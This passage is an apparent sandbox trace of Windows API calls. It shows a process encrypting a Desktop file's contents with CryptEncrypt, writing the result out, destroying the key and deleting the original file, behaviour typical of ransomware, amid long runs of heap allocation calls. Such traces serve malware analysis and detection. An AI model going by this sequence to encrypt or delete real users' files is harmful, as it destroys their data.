dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0105.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0105.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0105.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0105.711] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0105.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0105.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0105.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0105.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0105.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0105.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0105.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0105.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0105.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0105.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0105.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0105.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0105.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0105.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0105.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0105.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0105.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0105.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0105.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0105.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0105.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0105.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0105.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0105.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0105.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0105.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0105.711] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0105.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0105.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0105.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0105.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0105.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0105.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0105.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0105.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9f28, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0105.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0105.712] GetProcAddress (hModule=0x76390000, lpProcName="CryptEncrypt") returned 0x763c2cf0 [0105.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0105.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0105.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0105.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0105.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0105.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0105.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0105.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0105.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0105.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0105.712] CryptEncrypt (in: hKey=0x9a4780, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x1e8b, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x1e90) returned 1 [0105.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0105.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0105.712] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0105.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0105.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0105.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0105.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0105.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0105.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0105.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0105.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0105.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0105.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0105.713] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0105.713] CharLowerBuffW (in: lpsz="byte[7824]", cchLength=0xa | out: lpsz="byte[7824]") returned 0xa [0105.713] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0105.713] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0105.713] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0105.713] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0105.713] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9d90, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0105.714] CryptEncrypt (in: hKey=0x9a4780, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a7bfc8*, pdwDataLen=0x8cef60*=0x1e8b, dwBufLen=0x1e90 | out: pbData=0x2a7bfc8*, pdwDataLen=0x8cef60*=0x1e90) returned 1 [0105.714] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0105.714] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0105.714] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0105.714] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0105.714] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0105.714] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0105.715] WriteFile (in: hFile=0x44c, lpBuffer=0x2ad0720*, nNumberOfBytesToWrite=0x1e90, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2ad0720*, lpNumberOfBytesWritten=0x8cf5e4*=0x1e90, lpOverlapped=0x0) returned 1 [0105.716] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0105.716] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0105.716] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0105.716] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0105.716] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0105.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0105.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aa9bb0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0105.716] CryptDestroyKey (hKey=0x9a4780) returned 1 [0105.716] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0105.716] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0105.716] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0105.716] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0105.716] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0105.716] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0105.716] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0105.716] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0105.716] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0105.717] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0105.717] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0105.717] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0105.717] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0105.717] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0105.717] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0105.717] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0105.717] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0105.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0105.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f6f20, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0105.717] CryptReleaseContext (hProv=0x9bee68, dwFlags=0x0) returned 1 [0105.717] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0105.717] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0105.717] FreeLibrary (hLibModule=0x76390000) returned 1 [0105.717] CloseHandle (hObject=0x458) returned 1 [0105.719] CloseHandle (hObject=0x44c) returned 1 [0105.721] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0105.721] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0105.721] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/TtFu8ac2GuQ.mp3", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\TtFu8ac2GuQ.mp3", lpFilePart=0x8cedf4*="TtFu8ac2GuQ.mp3") returned 0x27 [0105.721] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\TtFu8ac2GuQ.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\ttfu8ac2guq.mp3")) returned 0x20 [0105.721] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\TtFu8ac2GuQ.mp3", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c10d530, ftCreationTime.dwHighDateTime=0x1d5cb12, ftLastAccessTime.dwLowDateTime=0xe28a1830, ftLastAccessTime.dwHighDateTime=0x1d5d390, ftLastWriteTime.dwLowDateTime=0xe28a1830, ftLastWriteTime.dwHighDateTime=0x1d5d390, nFileSizeHigh=0x0, nFileSizeLow=0x1e8b, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="TtFu8ac2GuQ.mp3", cAlternateFileName="TTFU8A~1.MP3")) returned 0x9a3b80 [0105.721] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\TtFu8ac2GuQ.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\ttfu8ac2guq.mp3")) returned 1 [0105.827] FindNextFileW (in: hFindFile=0x9a3b80, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c10d530, ftCreationTime.dwHighDateTime=0x1d5cb12, ftLastAccessTime.dwLowDateTime=0xe28a1830, ftLastAccessTime.dwHighDateTime=0x1d5d390, ftLastWriteTime.dwLowDateTime=0xe28a1830, ftLastWriteTime.dwHighDateTime=0x1d5d390, nFileSizeHigh=0x0, nFileSizeLow=0x1e8b, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="TtFu8ac2GuQ.mp3", cAlternateFileName="TTFU8A~1.MP3")) returned 0 [0105.827] FindClose (in: hFindFile=0x9a3b80 | out: hFindFile=0x9a3b80) returned 1 [0105.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75600 | out: hHeap=0x2af0000) returned 1 [0105.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0105.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0105.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0105.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0105.828] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0105.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0105.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0105.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0105.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0105.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0105.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0105.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0105.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0105.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0105.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0105.828] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0105.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0105.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0105.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9220 [0105.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0105.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0105.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9250 [0105.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0105.828] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0105.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0105.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6338 [0105.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0105.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0105.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0105.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0105.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0105.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0105.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0105.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0105.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0105.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0105.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0105.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0105.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7200 [0105.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0105.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a751c8 [0105.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6338 | out: hHeap=0x2af0000) returned 1 [0105.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0105.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0105.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0105.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0105.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0105.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0105.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0105.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0105.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0105.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0105.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0105.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0105.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0105.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0105.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0105.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0105.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0105.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0105.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0105.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x50) returned 0x29eb058 [0105.830] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/TtFu8ac2GuQ.mp3", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\TtFu8ac2GuQ.mp3", lpFilePart=0x8cf650*="TtFu8ac2GuQ.mp3") returned 0x27 [0105.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eb058 | out: hHeap=0x2af0000) returned 1 [0105.830] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\TtFu8ac2GuQ.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\ttfu8ac2guq.mp3")) returned 0xffffffff [0105.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a751c8 | out: hHeap=0x2af0000) returned 1 [0105.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0105.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0105.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0105.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0105.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0105.830] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0105.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0105.830] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0105.830] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0105.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0105.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, 